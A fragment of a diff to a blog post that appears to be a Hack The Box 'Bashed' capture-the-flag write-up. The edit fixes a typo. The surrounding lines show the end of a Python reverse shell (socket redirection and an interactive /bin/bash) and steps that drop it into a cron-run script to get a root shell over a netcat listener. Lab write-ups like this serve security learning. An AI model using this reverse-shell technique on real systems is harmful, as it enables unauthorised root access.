hhexme/hhexme.github.io/_posts/2020-07-31-htb-bashed.md

 os.dup2(s.fileno(),2)
 p=subprocess.call(["/bin/bash","-i"])
 ```
 And that should be it!!
-Liten on `2223` port on our machine with `netcat` and upload the script to **/scripts/test.py**.
+Listen on `2223` port on our machine with `netcat` and upload the script to **/scripts/test.py**.
 As soon as the cron job kicks in, we get the reverse shell on our machine as **root**

 ![root_shell](/assets/img/sample/htb-bashed-root-shell.png)